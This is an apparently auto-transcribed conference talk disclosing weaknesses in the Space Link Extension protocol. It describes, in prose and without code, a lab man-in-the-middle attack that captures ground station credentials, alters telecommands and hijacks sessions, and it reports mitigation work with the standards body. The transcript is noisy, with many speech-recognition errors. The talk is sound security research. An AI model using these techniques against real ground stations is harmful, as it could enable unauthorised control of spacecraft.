Ground Control To Major Threat: Hacking The Space Link Extension Protocol

so in the recent years uh space missions have been uh subject subject have been increasingly uh subject to security uh Bridges data Bridges and sometimes even satellite hacks um most of the discussion revolve around um space segment so like direct means of communicating with the satellite however um it is the ground segment that is going to be most likely targeted by the aders by the adversaries and that's because um this large um attack vector or attack surface so in this presentation I'll will give you a brief overview of the um of the space and ground segment and how they relate to each other from the attack surface point of view I will introduce you to sle uh protocol and the

security aspects of it and then I will demonstrate a couple of exploitation techniques which potentially give you um a a possibility take to Take Over Control of a spacecraft so uh every space mission can be Lo divided into space segment and ground segment obviously space segment is uh is very complex if you think about spacecraft is it's it's a very complex device but then if you think about it further it is just like one single point uh in a system it has one interface which means that from the attack surface it is just one element and therefore the attack surface is very small and on top of that the communication is challenging with the spacecraft and it's not because of the

technical aspects but rather because of the environmental aspects like visibility orbit or the distance between Earth uh and spacecraft the ground segment on the other hand is um consists of many interconnected components they are all on the ground and um there are many entry points because of that it creates or or imposes large attack surface on top of that to haug into a Grand Station you don't need any sophisticated equipment because it run on a standard infrastructure and also most of the software that is developed for space industry is a custom development which means that it creates or imposes a potential potential Avenues or additional avenues for uh for new vulnerabilities so at the extremely high

level uh this is how space mission more or less looks like you have a a space asset which is on the space segment and then everything else uh is on the ground where you have a ground station uh MCS which is stands for mission control system and then you have some users which use MCS to communicate uh they use MCS to communicate to the ground station uh and the spacecraft so the point I'm trying to make is it's going to be be much easier to hack into these things uh instead of build it if you actually want to try to hack spacecraft so now about SLE SLE stands for space link extension protocol in principle it's a protocol

that lets the users to send commands to spacecraft and receive telary from spacecraft it is based on the TCP uh on the TCP IP it supports uh encoding and authentication and it can be uh it can have two roles SLE user and SLE provider now SLE provider is a ground station in a natural and SL user is a it's a process which which going to run on the machine control system so in natural uh SLE defines a protocol for transferring uh pdus using pcpi for data transfers for data transfer and asn1 for data encoding in the system if you remember the previous uh diagram this is where the SLE is uh it's a link between the

mission control system and the ground station and now if you are thinking uh or wondering who is actually using this protocol for space missions the answer is is absolutely everyone so these are the uh the most uh famous suspects if you look at the documentation you will find a list of agencies that take care of of the development and maintenance of the protocol and then excuse me and then uh three times as many other organizations and entities who are actually using the the protocol for the space missiones it is also present on most of the ground segment uh devices there's special equipment which runs in the ground segment and also many organizations advertise it as a

protocol um on the list of their interfaces and capabilities like in this case the NASA space near uh near space Network so for our research uh we have decided to focus only on the um commanding capabilities because we want to demonstrate how easy it is to take over a spacecraft if you have access to the ground station or the ground segment in general so we focus on the F which stands for for communication link transmission unit and it's basically the thing that the users use to send commands to the spacecraft through the ground station it defines a a number of operations the the ones which we which we use in our exploitation techniques are the bind unbind start stop and

transfer data and you'll see in a moment what they are from the security standpoint because I'm Miss I'm I'm going to talk about security of the SLE um there is no um data privacy is there is no encryption on the protocol level there is a sequence number number sequence numbering to potentially prevent uh operation injection but that is is tried to bypass which will see later it comes with authentication but again there is no encryption only the credentials are encrypted so it's very easy to bypass that using the M attack as well so in our testing environment we we decided to keep it simple we have a s provider which as I mentioned before is

a ground station um in our case it's just like a DN machine with um Isa SLE API implementation we have SL user which is mission control system with uh running on Debian and another implementation of the SLE called python SLE it's a python package and this is just to demonstrate that it doesn't matter what implementation you use as long as you use you're going to be vulnerable because the implementation follows the standard otherwise it's not going to work at all and of course we have an attacker machine somewhere in the middle so this is an assume brid um testing scenario so adversaries are already in the network uh as I mentioned before there is no encryption so we thought that the

best way to demonstrate this or the most impactful way to demonstrate tra this is going to be using the the middle attack um so we basically start with the ar ar sping we captur the TCP um TCP frames we deod the TCP frames um or the data that they carry in the in the data field which are the ISP frames and I'll tell you what it is in a second uh we we manipulate the SE use which are the elements that we go to the spacecraft and we update the TCP frame and then forward to the destination so like in any other our menu the attack we poison the AR tables between the Miss mission control system

and the ground segment we make the traffic go through the attackers note uh we captur the TCP frames put them in the nfq filter for the um in the NF filter queue for the processing and this is actually where the fun begins uh as mentioned before we um we we are operating on the TCP level or at the TCP level so the the TCP frames data contain data field contains the um the pdus the data units in the isp1 format now isp1 it is it is an extension of asn1 encoding um or format which means that we to decode it we simply use T V values TV tlv fields to understand what are the values they are custom um in context

specific structures and sequences but they are they are specified in the documentation so it's very easy to uh to find what they are and so once we understand what those uh structures are then we can do the mapping uh to the fcl2 data type specification which is also in the documentation so this is how it looks like uh this is an example of um of the SE of a seal2 bind message that goes from machion control system to uh to the ground station you can see that there is scer there is like typical structure of the of the tlv and also some somewhere there um you will find credentials so um I will start with some

demonstration now I have a couple of videos recorded but before I'll show you the exploitation techniques I will uh show you how the nominal Behavior works or looks like how the nominal communication between the mission control system and the ground station looks like so um in this video you will see um cl2 mind message which is basically going to be this um B of string uh string bite we're going to send the start um which will set up some ground station equipment um at the ground station and then we're going to transfer some data then we're going to do stop and then unbind so that how the nominal communication would look like on the top on the top you have

the SLE um user which is U machine control system and then s provider on the bottom which is the um ground station and of course it doesn't [Music] play okay I I I'm unprepared for

that I'm going to try to play this

way so you're going to see this sequence of actions uh throughout the the rest of the presentation on other Demas so as I said before we start the ground station at the bottom and then we uh run our routine on the top the mission control system is communicating and sending some data to ground station which in the end will be sent uh to spacecraft because ground station is just a thing that pushes forward um the the the commanded products so that's how it looks like nominally now there are a couple of things we can do about it uh to make to make life um more difficult for The Operators one of them is to prevent authentication the reason

why it's extremely annoying for the users is because uh there is no um at the protocol level there is no feedback when you fail authentication which means that if you fail authentication the ground station is going to drop down the connection with no indication whatsoever you have no idea as a user you have no idea what's going on so it's it's it's going to be quite interesting to uh to see that actually in practice uh so what we do here we capture uh we capture the the frames with the bind um um message we mangle the credentials and then we push it forward to the ground station

so the setup is pretty much the same except that on the left hand side you have ra exploit that run the the middle um attack so we start the ground station and we go about with our routine we connect we bind oh okay that's because I'm still in the

presentation I swear it worked when I was testing it

so ground Station Mission Control System we start our routine we send the bind request we capture credentials by the way and we are in a weird state that we cannot um hold on okay this was just about capturing the credentials it was not mainly I so okay let me let me reverse it back so what you have just SE seen it was a demo that you can actually capture the credentials you can store it for later use and then you can um you can use it to establish your own s session between the between attacker machine and the ground segment and the ground ground station in order to uh hijack the communication of a spacecraft as if you were there uh

legitimate user so that's how you were um capturing the credentials now let me show you the next one course it is very tempting to start mangling mangling with the data that you actually sent to

spacecraft it's night now

so you what you will see uh is again standard communication between the mission control system and the ground station but instead of messing up with the operations we're going to actually capture the data we are going to be looking for a specific by string and then we're going to change it to something of uh of our liking

so as you can see on the top we have our exploit uh we are searching or monitoring on the wire for a string of bytes and then once we see it we're going to change it to something else and this is what going to be sent to spacecraft instead of the actual uh telecommand

products so we start our

exploit start on ground station and again the the users go about the routine uh as as as per usual now you can see that the users have sent uh by string from 0 to 9 packs we have captur it and then we send it something else what we have defined in the um in the exploit you can see that there is no integration check um neither MCS users no ground station have realized that you can actually do that or someone has actually done that uh so you are still operating in a stealth

mode okay and the last demo I have for you is uh when you try to take over the actual session so what you what you will see is uh we're going to put all of that together uh we're going to capture the credentials we're going to modify it in order to uh to fail the user authentication process but we're going to establish our own session using the users credentials and from that moment we will be able to command spacecraft or try to uh send the commands which uh which will be delivered in

spacecraft uh setup is pretty much the same on the left hand side uh at the bottom there is our or our our um or attackers um mission control system that's going to be pretending to be the legitimate

one and you run it um we do exactly the same thing as before we capture credentials we failed the authentication only ground station knows that authentication failed the user has no idea but we capture the credentials and we establish our own s session as if we were um the legitimate user of the ground station so from now on we can command us spacecraft to our

lucky okay conclusion what you just have seen is uh um just one way you can actually think of taking over our control of space c if you know what are the vulnerabilities of the SLE protocol in our research we only focus on the telec commanding capabilities because we wanted to render as much impact as possible but of course we can also start um your operations in a more stealth mode and process the Telemetry and also modify the Telemetry so then the operators um don't know what is happening uh because it's going to be false if you want to have a um meaningful communication with a spacecraft there is some spacecraft knowledge required because you need to

understand the commanding products which you are sending to spacecraft or the spacecraft has to understand what you are sending to to it um but otherwise all the knowledge we which which I have presented it was uh gather using the Oink so all the documentation um is made available publicly um and so anyone can actually can can do the research U ccsds the standardization body which is um responsible for sle uh they came up with space data link security which is uh which is basically imposing the encryption on it however they have done that only on the link between the ground station and the and the spacecraft itself which means that the link between the mission control

system and the ground station is still vulnerable and we are now working with them uh to enable PS like um features on the ISP one level in order to mitigate those issues so uh for the F further work um we are planning to run some tests on the actual ground station which we know that is a smile lab they have cortex devices so our idea would be to actually demonstrate it on the actual ground station devices um and then we're going to further work on the exploit we've coming up some additional ways to demonstrate these vulnerabilities of the of the standard and I guess at some point we're going to open source it so uh this is a list of uh referen

you will find the whole list in the publication as I said everything uh is open source so we can do your own research on this and our our research you can find um on this URL we have done some additional research on other ground segment um and space segment applications mainly from uh NASA open source software so if you are interesting interested Deion that you can uh just follow the links I guess I can give it later after talk and that was the last slide thank you very [Applause] much yeah thank you Andy uh any questions from the audience there's one question over there see wait for the microphone that way NASA can also listen in what

you're asking uh thanks a lot for your talk um do you have any insights on real world attacks leveraging the um the methodologies you described no okay thanks nevertheless any other question I oh yeah I have a question on the slide at the beginning about confidentiality and the decr prot ction you were saying there a sequence number so that helps with replay protection but what is actually there for integrity protection of a message what is there to do what so you had this slide with that talked about confidentiality and integrity protection right you talked about a sequence number so sequence number helps with replay protection but it does not provide Integrity protection so my question is what is there for integrity

protection of a message there is no Integrity protection you can put what whatever you want okay so you sequence so that's the whole point that's that's the whole point yeah right so the sequence time is was useless yes absolutely okay thanks that's what I say is trival to bypass any other question from the audience no going once going twice well thank you very much Andy again for the great talk it was really far out there